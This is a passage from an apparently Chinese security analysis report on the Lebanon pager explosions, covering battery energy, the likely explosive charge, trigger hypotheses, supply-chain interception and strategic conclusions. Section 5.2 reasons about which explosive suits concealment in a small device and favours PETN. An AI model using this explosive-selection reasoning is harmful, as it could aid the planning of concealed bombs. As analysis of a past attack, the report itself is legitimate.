电池储存的总能量可以通过以下公式计算:能量(瓦特时)=电压(伏特)×容量(安时),将容量从毫安时转换为安时:1000 mAh=1 Ah,计算总能量:能量=1.5 V×1 Ah=1.5瓦特时(Wh),将能量转换为焦耳(J):1瓦特时等于3600焦耳,能量(焦耳)=1.5 Wh×3600 J/Wh=5400 J。电池的总能量储存约为5400焦耳。 然而,爆炸物的威力不在于总能量,而在于能量的释放速率,1kg TNT爆炸放出的总能量,不及1kg优质煤完全燃烧放出的总能量,但TNT等炸药能在数百万分之一秒的时间内释放出所有爆炸能量,这是爆炸物有着巨大破坏力等根本来源。无论是碱性电池或锂电池,都不具备瞬间释放的机理条件。因此从现场伤亡的情况看,电池短路即使引起起火,释放能量的速率也远不足以造成这样程度的杀伤威力。完全可以肯定爆炸是由高爆物产生的。 5.2 爆炸装药型号信息与猜测 从能量释放速率角度分析,明显均不可能达到目前已有信息中的视频、文字信息中的爆炸后果。目前技术专家已经普遍认为,根据强度和速度判断爆炸显然是由一种爆炸物引起的。从具体火炸药类型看,必然不是黑火药、烟火剂等一般爆炸物,只能是猛炸药。而事件中的猛炸药要稳定(寻呼机运输装卸过程中必然要稳定),又要容易起爆,在体积小的同时威力还要足够,雷酸银(雷银)等高感度起爆药,以及一般民间自制的TATP等不稳定过氧化物均不太可能,TNT等需要较多量起爆药才能起爆的不易起爆芳香族硝基化合物可能性也不大,相对容易起爆,威力(猛度)又大的PETN(季戊四醇四硝酸酯,戊四硝酯,又称太安,猛度高于TNT)等硝酸酯类炸药可能性比较大。整体来看,寻呼机本身在事件中所起到的是遥控触发器加爆炸物承载容器的作用。目前网络信息多半推断为PETN(季戊四醇四硝酸酯),关于爆炸装药在电池内部还是在寻呼机内部,目前信息尚不足以支撑判断,分析小组整体倾向爆炸装药在电池内部,这亦可解释出现目前未确定信源反馈的其他电子设备爆炸情况,是由于将带有爆炸物的电池装入其他电器的后果,但其他信息则目前难以判断。 6 寻呼机触发爆炸原理分析 从目前已发生爆炸的两款寻呼机型号分别为,Gold Apollo公司型号为AP-900 GP、AR-924的两款寻呼机产品,据BBC报道及一些新闻报道显示,爆炸是在寻呼机使用者在收到一串“字母数字”短信后发生爆炸,为此可推断,该设备在供应链环节被植入“爆炸物”,并对寻呼机触发机制进行了重新编码或植入引爆用传感器。对于第一种推断,我们推测该设备需要在供应链中进行两个步骤的操作,第一个步骤为对寻呼机设备进行编程配置,用户设备触发。第二个步骤为在寻呼机设备中预置爆炸物结合装置电路,改造引爆条件电路。对于第二种推断,该设备需要在供应链中预置爆炸物与写有引爆逻辑的传感器,并调整电路连接。我们分析了相关产品的资料包括软件编程设置信息。绘制了多种路径的触发原理,但避免信息滥用,在公开版分析报告中屏蔽具体触发过程分析和图示等内容,仅在报送主管部门版本中保留了相关信息。 7 供应链预置分析 此次爆炸,外界普遍认为是基于供应链侧的通讯设备预置爆炸物。整体倾向预制过程应为仓储和物流环节,而非生产制造环节。如事件发生后,爱德华·斯诺登在X上发文称(见下图),该事件使他想起曾在2013年曝光大规模监控事件时披露,美国国家安全局(NSA)如何在机场拦截运往目标国家的计算机网络设备,安装植入物,然后重新包装发往目标,以渗透目标网络。斯诺登称,“十年过去了,(在此期间)运输安全从未得到改善”,暗指黎巴嫩寻呼机事件与美以情报机构的供应链预置不无关系。 图7-1 斯诺登张贴图片为NSA人员劫持配送中的路由设备替换固件照片 美国国家安全局(NSA)前情报分析员戴维·肯尼迪称,从网上分享的视频中看到的爆炸似乎“规模太大,不可能是远程直接黑客攻击,导致寻呼机超载并引起锂电池爆炸”,“更有可能的是,以色列在真主党中安插了人员,寻呼机中可能植入了炸药,只有收到特定信息时才会爆炸”。肯尼迪认为,“实现这一目标所需的复杂性令人难以置信,需要许多不同的情报组件和执行。人力情报(HUMINT)是实现这一目标的主要方法,同时拦截供应链以对寻呼机进行修改。” 特别需要关注排查分析的是如果确如金阿波罗公司声明所言,相关寻呼机由欧洲BAC·CONSULTING·KFT代工生产。这其中有令人费解之处,由于中国台湾地区的人力成本较低,而欧洲人力成本较高,寻呼机又是一种落后技术产品,而相关欧洲厂商提出将制造转移到欧洲本土,是不太寻常的事情,这是否实际是情报机构前置布局,仍需要深度观察。 8 结论 基于电信设备进行遥控爆炸暗杀,并非罕见事件。国内外多起治安案件、以及国际大量恐怖主义案件中,都曾有寻呼机或手机出现,但本事件鲜明的差异为: 1) 本事件寻呼机同时具有触发器和爆炸容器双重属性;历史事件多数以寻呼机作为触发器,但并不作为爆炸物容器。 2) 本事件寻呼机有可能实现了基于特定信号触发,以实现统一触发;多数事件由寻呼机收到信号即触发,而非需要特定信号触发。 3) 本事件是对特定群体的批量定向攻击;而历史事件或者为针对个体目标的定向攻击,或者针对群体目标的无差别攻击。 综上所有分析,我们研判该事件整体上是一起基于供应链侧作业,将爆炸物和通讯设备相结合,利用远程信号激活控制机理,实现批量触发爆炸的严重地缘安全事件,是组合了供应链预置、电磁频谱攻击、情报搜集、人力作业等在内复杂杀伤链过程,是精心策划的跨越物理域、网空和信号频谱域与认知域的联合作业。从作业过程来看,网络攻击作业在其中可能扮演了持续情报采集作用,如获取相关物流信息、摸排目标组织运行规律等,包括最终触发信号如果不是由电子战设备所释放,则也不排除其寻呼台设备遭遇网络入侵的情况。但整体来看,本事件的主导因素依然是物理、传统电磁频谱和人力作业。不应过度夸大网络攻击在其中的作用,而应基于客观严谨的分析,深入总结事件的规律性因素,包括: 1) 网络装备的主导性在平时,物理装备的主导性在战时,依然是目前的基础战争逻辑。 2) 对于低网络依赖的主体很难依赖网络作业达成关键效果,但集合物理、电磁、和认知频谱可能形成压倒性效能。 3) 试图通过逆信息化的方式来实现自身安全可能将带来更大的安全被动。 面对这种复合作业方式,让我们必须走出窄带网络安全视角,从总体国家安全视角,以大网络安全看待未来的斗争与挑战。强化人防、物防、技防结合,将安全要素贯穿全生命周期中。 中东烽火,更让我们看到国家强大方能安宁。 参考链接 1) The Mystery of Hezbollah’s Deadly Exploding Pagers https://www.wired.com/story/pager-explosion-hezbollah/ 2) At least 3 types of pagers were planted with bombs https://twitter.com/clashreport/status/1836105986831966483 3) Hezbollah blames Israel after pager explosions kill nine and injure thousands in Lebanon https://www.bbc.co.uk/news/articles/cd7xnelvpepo 4) Product Family-Alpha Gold https://americanmessaging.net/wp-content/uploads/2019/10/unication_gold_pps.pdf 5) Alphanumeric Pager (AP-900) https://www.gapollo.com.tw/product/ap-900/ 6) Gold Apollo Rugged Pager AR924- Apollo systems https://web.archive.org/web/20240917160632/https://apollosystemshk.com/product/42.html 7) Rugged Pager AR924 - GOLD APOLLO https://web.archive.org/web/20240917152704/https://www.gapollo.com.tw/rugged-pager-ar924/ 8) scmp pager explosion https://www.scmp.com/news/world/middle-east/article/3278939/hezbollah-blames-israel-deadly-pager-blasts-lebanon-how-was-it-done